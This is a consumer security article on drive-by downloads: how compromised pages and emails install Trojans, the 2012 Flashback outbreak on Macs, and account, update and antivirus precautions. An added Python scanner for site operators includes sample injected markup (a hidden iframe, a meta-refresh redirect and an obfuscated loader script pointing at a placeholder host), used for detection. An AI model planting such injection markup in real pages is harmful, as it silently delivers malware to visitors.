Drive-By Downloads: How They Attack and How to Defend Yourself
Drive-by downloads are malicious pieces of software that are downloaded to a computer, tablet or smartphone when the user views a compromised Web page or an HTML-based email message that links to a website.
In many cases, the malware will be automatically installed on the system; in almost all cases, the user won't be aware of it.
The malware delivered by a drive-by download is usually classified as a Trojan horse, or Trojan for short, because it deceives the user about the nature of the website or email. In most cases involving compromised websites, the operator of the website has no idea his site is distributing malware.
Once installed, malware delivered by a drive-by download can do a number of different things: log keystrokes, scan the system for files of a personal nature, herd the system into a botnet of similarly compromised machines, infect the Web browser with a banking Trojan that hijacks online-banking sessions or install a "backdoor" that will let in even more malware.
Modern Web browsers such as Firefox and Google Chrome, as well as robust anti-virus software, will alert users when browsers visit websites known to be compromised or malicious. But many drive-by download links are well hidden and won't cause infected sites to appear on blacklists of compromised sites.
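Because well-hidden injection points will not show up on blacklists, a site operator has to look for them in the page markup itself. As an added example that is not part of the original article, this Python scanner flags the common ways a compromised page is made to pull in a second site: hidden or near-zero-size iframes, meta-refresh redirects, and inline scripts that decode and write content. The indicators and the sample blog page are constructed assumptions, not data from the article.

```python
import re
from html.parser import HTMLParser

# Constructed sample: a blog page with an injected redirect, a hidden iframe and an
# obfuscated loader script next to a legitimate video embed (not a real site).
SAMPLE_HTML = """<html><head>
<meta http-equiv="refresh" content="0; url=http://example.invalid/landing">
</head><body><p>Welcome to my blog</p>
<iframe src="http://example.invalid/in.php" width="1" height="1" style="visibility:hidden"></iframe>
<iframe src="https://video.example/embed/123" width="640" height="360"></iframe>
<script>document.write(unescape('%3Cscript src=%22http://example.invalid/x.js%22%3E%3C/script%3E'));</script>
</body></html>"""

class DriveByScanner(HTMLParser):
    """Flags markup patterns used to make a page silently load another site (assumed heuristics)."""

    def __init__(self):
        super().__init__()
        self.findings = []      # list of (indicator, detail) review candidates, not verdicts
        self._in_script = False

    def handle_starttag(self, tag, attrs):
        a = {k.lower(): (v or "") for k, v in attrs}
        if tag == "iframe":
            style = a.get("style", "").replace(" ", "").lower()
            tiny = any(a.get(d, "").strip() in ("0", "1", "0px", "1px") for d in ("width", "height"))
            hidden = ("display:none" in style or "visibility:hidden" in style
                      or re.search(r"(left|top):-\d{3,}", style) is not None)
            if tiny or hidden:
                self.findings.append(("hidden-iframe", a.get("src", "")))
        elif tag == "meta" and a.get("http-equiv", "").lower() == "refresh":
            if m := re.search(r"url=(\S+)", a.get("content", ""), re.I):
                self.findings.append(("meta-refresh", m.group(1)))
        elif tag == "script":
            self._in_script = True

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

    def handle_data(self, data):
        # Decode-then-write patterns are how injected loaders hide the URL they fetch.
        if self._in_script and "document.write" in data and re.search(r"(unescape|eval|fromCharCode)\s*\(", data):
            self.findings.append(("obfuscated-script", data.strip()[:40]))

def scan_html(html):
    # Return the list of (indicator, detail) findings for one page's HTML.
    p = DriveByScanner()
    p.feed(html)
    p.close()
    return p.findings
```

Run `scan_html` over each page of a site and review the flagged iframes and redirects by hand; a legitimate embed will be visibly sized and point at a host the operator recognises.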
A real-world example
The Mac Flashback outbreak, which infected an estimated 600,000 Macs in March 2012, showed how successful drive-by downloads can be.
Malware writers began by creating a fake "toolkit" for WordPress-based blogs that tens of thousands of WordPress users installed, creating a "backdoor" that let the malware writers infect their blogs.
Visitors to those pages were redirected to malware sites, which tried to install a "downloader," the first part of the Flashback Trojan. If installing the downloader without the user's knowledge failed, another piece of malware fell back on a more traditional technique: it asked the user for permission to install (fake) Apple software, which was in fact the downloader.
Once installed, the downloader would install more malware. One piece was a backdoor; another hijacked Web browsers to replace Web ads with ads controlled by the malware writers.
The Flashback outbreak was contained by Apple security updates in early April 2012, but in retrospect, the owners of those 600,000 infected Macs were lucky.
The backdoor didn't install anything except fake ads. It could have instead stolen the users' identities, emptied their bank accounts or used the infected machines to pump out spam and malware.
How to protect yourself
To avoid being infected by drive-by downloads, computer users need to do three things.
First, set up the user accounts so that all regular users have limited permissions and cannot modify applications or the operating system. Create a separate administrator account to be used only when installing, updating or deleting software. Do not use the administrator account to browse around the Web or read emails.
Second, set the computer so that operating-system updates are automatically installed, and turn on whatever firewalls are available. (If you have a wireless router, its firewall should also be activated.)
Third, install a robust anti-virus software product, set it to automatically update itself with the latest malware definitions, and make sure it performs regular full-system scans.
Many free anti-virus products are available, but the paid ones do a better job of protecting Web browsers and email clients from drive-by downloads.
Smartphone and tablet users need to take different precautions. Owners of Apple iOS devices such as the iPhone, iPad and iPod Touch should avoid "jailbreaking" their devices and should install Apple system updates.
Android owners, however, should never immediately install a system update that suddenly appears on their screen; instead, they should first consult the Google Mobile Blog to confirm that it's legitimate. Mobile security software is also essential for Android users.